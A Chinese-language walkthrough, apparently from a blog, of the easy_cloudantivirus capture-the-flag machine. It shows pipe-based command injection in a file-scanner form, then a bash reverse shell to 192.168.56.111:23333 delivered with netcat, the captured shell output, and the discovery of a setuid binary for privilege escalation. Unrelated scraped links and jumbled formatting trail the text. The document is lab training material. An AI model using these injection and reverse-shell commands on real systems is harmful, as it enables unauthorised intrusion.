页面,通过简单的探索发现此页面是这个 Web 应用的后台管理页面,其中存在数据提交,但通过关键词 Try scanning some of these files with our scanner! 知道传入的数据是被某种程序进行查杀,更多的是涉及 shell 中执行
<html><body><h1>Cloud Anti-Virus Scanner!</h1><h3>Try scanning some of these files with our scanner!</h3><pre>total 4756-rwxr-xr-x 1 scanner scanner 1113504 Oct 212018 bash-rwxr-xr-x 1 scanner scanner34888 Oct 212018 bzip2-rwxr-xr-x 1 scanner scanner35064 Oct 212018 cat-rw-rw-r-- 1 scanner scanner68 Oct 212018 eicar-rw-rw-r-- 1 scanner scanner5 Oct 212018 hello-rwxr-xr-x 1 scanner scanner35312 Oct 212018 netcat-rwxr-xr-x 1 scanner scanner 3633560 Oct 212018 python</pre><form action="/output" method="POST"><input type="filename" name="filename" placeholder="File Name"><input type="submit" value="https://www.huyubaike.com/biancheng/Scan!"></form></body></html>我们可以尝试使用 | 管道进行命令串联,改变回返的数据内容,并夹杂我们想要的信息
- 输入尝试
a | id得到了下面结果,这说明其中的数据没有过滤,我们可以通过这个执行命令
uid=1001(scanner) gid=1001(scanner) groups=1001(scanner)
- 通过这个漏洞,我们可以构建一个
a | ls | grep 'xxxxx' | 想要执行的命令
- 我们可以查看是否存在
wget有助于木马上传,配合 metasploit 攻击
- 也可以使用 nc 反弹 shell 依次执行下面命令,但上面的 nc 版本不利于反弹,也可以使用 nc 实现但比较麻烦
- nc 上传 bash 反弹木马程序
- 表单提交
a | ls | grep 'xxxxx' | touch a.sh - 表单提交
a | ls | grep 'xxxxx' | nc -l -p 4444 -w6 > a.sh - 在 kali 执行
nc 192.168.56.109 4444 < 'bash -i >& /dev/tcp/192.168.56.111/23333 0>&1' - 在 kali 执行
netcat -lvp 23333监听端口 - 表单提交
a | ls | grep 'xxxxx' | bash a.sh反弹 shell
- 表单提交
┌──(kali?kali)-[~/workspace]└─$ netcat -lvp 23333listening on [any] 23333 ...192.168.56.109: inverse host lookup failed: Unknown hostconnect to [192.168.56.111] from (UNKNOWN) [192.168.56.109] 52396bash: cannot set terminal process group (694): Inappropriate ioctl for devicebash: no job control in this shellscanner@cloudav:~/cloudav_app$ lslsapp.pya.shdatabase.sqlget-pip.pyget-pip.py.1get-pip.py.2get-pip.py.3samplestemplatesscanner@cloudav:~/cloudav_app$- 成功反弹 shell
- 我们可以查看是否存在
探索目标我们已经进入目标的内部,我们探索一下目录、文件
- 【靶机: easy_cloudantivirus】我们在用户根目录发现一个有特殊权限的文件
-rwsr-xr-x 1 rootscanner 8.4K Oct 242018 update_cloudav
scanner@cloudav:~$ ls -alhls -alhtotal 60Kdrwxr-xr-x 6 scanner scanner 4.0K Oct 242018 .drwxr-xr-x 4 rootroot4.0K Oct 212018 ..-rw------- 1 scanner scanner5 Oct 242018 .bash_history-rw-r--r-- 1 scanner scanner220 Oct 212018 .bash_logout-rw-r--r-- 1 scanner scanner 3.7K Oct 212018 .bashrcdrwx------ 2 scanner scanner 4.0K Oct 212018 .cachedrwxrwxr-x 4 scanner scanner 4.0K Oct 23 10:59 cloudav_appdrwx------ 3 scanner scanner 4.0K Oct 212018 .gnupgdrwxrwxr-x 3 scanner scanner 4.0K Oct 212018 .local-rw-r--r-- 1 scanner scanner807 Oct 212018 .profile-rw-rw-r-- 1 scanner scanner66 Oct 212018 .selected_editor-rwsr-xr-x 1 rootscanner 8.4K Oct 242018 update_cloudav-rw-rw-r-- 1 scanner scanner393 Oct 242018 update_cloudav.c- 在linux中,
-s指的是强制位权限,具有程序运行时子进程权限继承,s 权限位是一个敏感的权限位,容易造成系统的安全问题经验总结扩展阅读
- breakout靶机
- 靶机: medium_socnet
- 结合springboot实现,这里对接的是easy版本,工具用的是IDEA,WebStrom 支付宝沙箱服务
- easyclip软件怎么卸载?
- easyanticheat是什么软件
- easypdf可以卸载吗
- easy是什么意思
- 在linux中,
